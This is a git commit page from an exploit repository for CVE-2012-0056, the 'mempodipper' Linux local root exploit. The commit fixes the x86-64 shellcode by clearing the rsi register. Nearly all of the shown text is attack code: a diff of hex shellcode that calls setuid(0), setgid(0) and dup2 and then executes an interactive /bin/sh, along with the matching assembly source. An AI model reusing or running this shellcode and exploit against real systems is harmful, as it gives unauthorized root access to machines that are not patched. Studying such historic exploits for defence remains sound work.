aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 06:22:53 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 06:22:53 +0100
commit948714701ce5a27f560b34301c75ae31b468d477 (patch)
tree0b450d63a69ccc75c250834386d362e6aabaa0e9
parentInitial attempts at ptrace style resolving of symbols. (diff)
downloadCVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.tar.xz
CVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.zip
Fix shellcode for dirty rsi.
-rw-r--r--mempodipper.c11
-rw-r--r--shellcode-64.s1
2 files changed, 6 insertions, 6 deletions
diff --git a/mempodipper.c b/mempodipper.c
index fccc253..cc2a0fd 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -171,12 +171,11 @@ int main(int argc, char **argv)
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
- "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
- "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
- "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
- "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
- "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+ "\x31\xf6\x40\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+ "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+ "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
diff --git a/shellcode-64.s b/shellcode-64.s
index f465c5d..517b617 100644
--- a/shellcode-64.s
+++ b/shellcode-64.s
@@ -14,6 +14,7 @@ xor rdi,rdi
mov al,0x6a
syscall
;dup2(6, 2)
+xor rsi,rsi
mov dil,0x6
mov sil,0x2
mov al,0x21